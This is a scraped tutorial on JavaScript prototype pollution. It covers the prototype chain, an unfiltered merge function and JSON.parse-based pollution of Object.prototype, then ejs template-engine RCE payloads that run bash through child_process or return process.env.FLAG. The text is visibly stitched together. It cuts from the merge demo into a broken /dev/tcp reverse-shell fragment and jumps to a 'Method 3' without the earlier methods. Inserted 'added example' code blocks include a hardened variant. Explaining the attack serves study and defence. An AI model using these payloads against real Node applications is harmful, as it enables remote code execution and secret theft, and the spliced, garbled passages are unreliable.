
What is the JavaScript Prototype pollution attack?

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article explains what a JavaScript prototype pollution attack is: how the prototype chain works, how an unfiltered merge lets an attacker write onto Object.prototype, and how such a polluted property reaches code execution in a template engine.

0x00 Main text

Prototype and prototype chain

In JavaScript, a "class" is defined by writing a constructor function (the class keyword is syntactic sugar over the same mechanism). Defining a function therefore also defines a class with the function's name, whose instances are created with new.

Prototype

Every function object has a prototype property, which points to the object that instances created by that constructor will inherit from. When an object is instantiated with new, it inherits the properties and methods defined on that prototype.

Every object has a __proto__ property, which points to the prototype property of the constructor function that created it (Object.getPrototypeOf(obj) returns the same object).

P神's (phith0n's) article on JavaScript prototype pollution attacks summarizes this as two properties:

prototype is a property of a class (constructor function); every object instantiated from that class has the properties and methods defined on prototype.

__proto__ is a property of an object instance; it points to the prototype property of the class the object was created from.

Prototype chain

The prototype chain is JavaScript's mechanism for inheritance and upward property lookup: a function object reaches its prototype through the prototype property, and an ordinary instance reaches its constructor's prototype through __proto__.

This lookup mechanism, which JavaScript uses to implement object-oriented inheritance, is called the prototype inheritance chain: when a property is not found on an object itself, the engine looks on its __proto__, then on that object's __proto__, and so on until it reaches Object.prototype, whose __proto__ is null.

Each constructor has a prototype object (prototype).

The __proto__ property of an object points to the prototype object of its class.

JavaScript uses the prototype chain to implement inheritance.

For details, please refer to the following illustration (see Appendix for links)
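The lookup described above, as an added example that is not part of the original article. The Animal and Dog constructors are illustrative; lookupPath records which objects on the chain the engine visits before it finds a property, which is the same walk the illustration draws.

```javascript
'use strict';
// Added example (not from the original article): how constructor, prototype and
// __proto__ relate, and how property lookup walks the prototype chain.

function Animal(name) {
  this.name = name;                          // own property of each instance
}
Animal.prototype.speak = function () {       // shared through Animal.prototype
  return this.name + ' makes a sound';
};

function Dog(name) {
  Animal.call(this, name);
}
// Dog.prototype -> Animal.prototype -> Object.prototype -> null
Dog.prototype = Object.create(Animal.prototype);
Dog.prototype.constructor = Dog;
Dog.prototype.speak = function () {          // shadows Animal.prototype.speak
  return this.name + ' barks';
};

// Walk the chain the way the engine does and return the labels of the objects
// visited until an own property named `prop` is found; null if the chain ends.
function lookupPath(obj, prop) {
  const path = [];
  let cur = obj;
  while (cur !== null) {
    const label = cur === obj ? 'instance'
      : cur === Dog.prototype ? 'Dog.prototype'
      : cur === Animal.prototype ? 'Animal.prototype'
      : cur === Object.prototype ? 'Object.prototype' : '?';
    path.push(label);
    if (Object.prototype.hasOwnProperty.call(cur, prop)) return path;
    cur = Object.getPrototypeOf(cur);        // same object as cur.__proto__
  }
  return null;
}

function chainFacts() {
  const d = new Dog('Rex');
  return {
    protoIsDogPrototype: Object.getPrototypeOf(d) === Dog.prototype,
    dunderProtoSame: d.__proto__ === Dog.prototype,
    chainToObject: Object.getPrototypeOf(Animal.prototype) === Object.prototype,
    speak: d.speak(),                        // 'Rex barks' (Dog.prototype wins)
    namePath: lookupPath(d, 'name'),         // ['instance']
    speakPath: lookupPath(d, 'speak'),       // ['instance', 'Dog.prototype']
    toStringPath: lookupPath(d, 'toString'), // ends at Object.prototype
    missingPath: lookupPath(d, 'nope'),      // null: nothing on the whole chain
  };
}
```

The toString lookup is the one to keep in mind for the rest of the article: every plain object walks all the way to Object.prototype for anything it does not own, so a property planted there is visible from every object in the process.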

Prototype chain pollution

Prototype pollution is the ability to inject properties into existing JavaScript language prototypes (such as Object.prototype).

JavaScript allows every property of an object to be changed, including the "magic" ones: __proto__, constructor and prototype.

In an application, if an attacker can control and modify the prototype of an object, the change affects every object that shares that class or parent class. Because all JavaScript objects inherit from Object.prototype through the prototype chain, polluting Object.prototype affects every object in the process. This is prototype chain pollution.

Once this happens, an attacker can plant values that tamper with program logic or, where the polluted property reaches a sensitive sink, execute commands.

How prototype chain pollution arises

As P神's article points out, prototype chain pollution comes down to the attacker being able to set the value of __proto__. So the places to look are operations where __proto__ can be set, or more generally where the attacker controls the key names used to write into an object. Typical examples:

Object merge

Object clone (merging the object to be copied into an empty object)

Suppose an application has a merge operation like this:

    function merge(target, source) {
        for (let key in source) {
            if (key in source && key in target) {
                merge(target[key], source[key])
            } else {
                target[key] = source[key]
            }
        }
    }

The key names are not filtered here, so if key is __proto__, prototype chain pollution follows: target["__proto__"] is Object.prototype, and the recursive call writes the attacker's properties onto it.

Note that this needs JSON.parse (or similar) to cooperate. When __proto__ is written in an object literal, JavaScript treats it as the object's prototype, not as a key name: merge then copies the inherited b as an ordinary own property of the target, and Object.prototype is untouched. When the same text goes through JSON.parse, "__proto__" becomes a real own key named __proto__, and merge walks up into Object.prototype. For example:

    > let o2 = {a: 1, "__proto__": {b: 2}}
    > merge({}, o2)
    > console.log({}.b)        // undefined: only o2's own prototype was involved
    > let o3 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
    > merge({}, o3)
    > console.log({}.b)        // 2: Object.prototype is now polluted

/ dev/tcp/xxxxx/xx\ ") /"}

On the backend, the template engine (the compile step of ejs) builds the rendering function by string concatenation. outputFunctionName is read straight from the options object, so a value planted on Object.prototype is picked up as if the caller had passed it:

    prepended += '  var ' + opts.outputFunctionName + ' = __append;' + '\n';

After injection, with outputFunctionName polluted to a value that opens a statement, calls process.mainModule.require('child_process').exec('bash -c "echo $FLAG > /..."') and ends with //, the generated line becomes

    var x;process.mainModule.require('child_process').exec('bash -c "echo $FLAG > /..."');// = __append;

and the rest of the original line (= __append;) is commented out.

Once the prototype chain is polluted this way, rendering any template runs the injected code at the top of the generated function, which executes the command and returns early: a shell is obtained.

Method 3: backend RCE through opts.escapeFunction

There is another usable spot in the same compile function:

    var escapeFn = opts.escapeFunction;
    var ctor;
    ....
    if (opts.client) {
        src = 'escapeFn = escapeFn || ' + escapeFn.toString() + ';' + '\n' + src;
        if (opts.compileDebug) {
            src = 'rethrow = rethrow || ' + rethrow.toString() + ';' + '\n' + src;
        }
    }

When opts.client is truthy, escapeFn.toString() is spliced into the source of the rendering function. If escapeFunction has been polluted with a string, toString() returns that string and it is pasted in as code, so a fake escapeFunction also gives RCE:

    {"constructor": {"prototype": {"client": true, "escapeFunction": "1; return process.env.FLAG", "debug": true, "compileDebug": true}}}

The generated source then begins with escapeFn = escapeFn || 1; return process.env.FLAG;, so the rendering function returns the flag before any template output is produced.

This is what the JavaScript prototype pollution attack looks like; readers with similar questions can refer to the analysis above.
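The option-lookup weakness behind Method 3, as an added example that is not ejs's own code: a stripped-down compile() with the same concatenation shape as the quoted lines, a benign stand-in payload instead of process.env.FLAG, and a hardened variant that only honours own properties of the options object. compile, withPollution and the PAYLOAD string are this example's own constructions.

```javascript
'use strict';
// Added example (not ejs's own code): a minimal code generator that reads its
// options the same way the quoted compile() does, to show how polluted
// client/escapeFunction values end up inside new Function().

const defaultEscape = (s) => String(s).replace(/</g, '&lt;').replace(/>/g, '&gt;');

// own=false reads options with plain property access (the weak spot: a missing own
// property falls through to Object.prototype); own=true honours own properties only.
function compile(template, opts, own) {
  opts = opts || {};
  const get = own
    ? (k) => (Object.prototype.hasOwnProperty.call(opts, k) ? opts[k] : undefined)
    : (k) => opts[k];
  let src = 'var __output = "";\n' +
            '__output += escapeFn(' + JSON.stringify(template) + ');\n' +
            'return __output;';
  const escapeFn = get('escapeFunction') || defaultEscape;
  if (get('client')) {
    // escapeFn.toString() is spliced in verbatim; for a string value that means the
    // string itself becomes statements at the top of the generated function
    src = 'escapeFn = escapeFn || ' + escapeFn.toString() + ';' + '\n' + src;
  }
  const fn = new Function('locals, escapeFn', src);
  return (locals) => fn(locals, escapeFn);
}

function renderClean() {
  return compile('<b>', {})({});          // '&lt;b&gt;'
}

// Constructed payload with the shape from the text. The vulnerable merge of the
// previous section walks constructor -> prototype and lands on Object.prototype;
// the Object.assign below is what that walk amounts to ({}.constructor is Object).
const PAYLOAD = '{"constructor":{"prototype":{"client":true,' +
                '"escapeFunction":"1; return \'pollution reached the compiler\'"}}}';

function withPollution(fn) {
  const p = JSON.parse(PAYLOAD);
  Object.assign(({}).constructor.prototype, p.constructor.prototype);
  try {
    return fn();
  } finally {                               // undo so other code is not affected
    delete Object.prototype.client;
    delete Object.prototype.escapeFunction;
  }
}

function renderPolluted() {
  // the caller passes no options at all, yet client and escapeFunction are "set"
  return withPollution(() => compile('<b>', {})({}));   // 'pollution reached the compiler'
}

function renderHardened() {
  // same pollution, but options are read as own properties only
  return withPollution(() => compile('<b>', {}, true)({}));   // '&lt;b&gt;'
}
```

The hardened variant is a mitigation at the sink: it stops a polluted prototype from being mistaken for caller-supplied options, but it does not stop the pollution itself, which still has to be fixed in the merge. Both are worth having, since the generated function here is built with new Function() and any string that reaches escapeFunction is executed as code.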
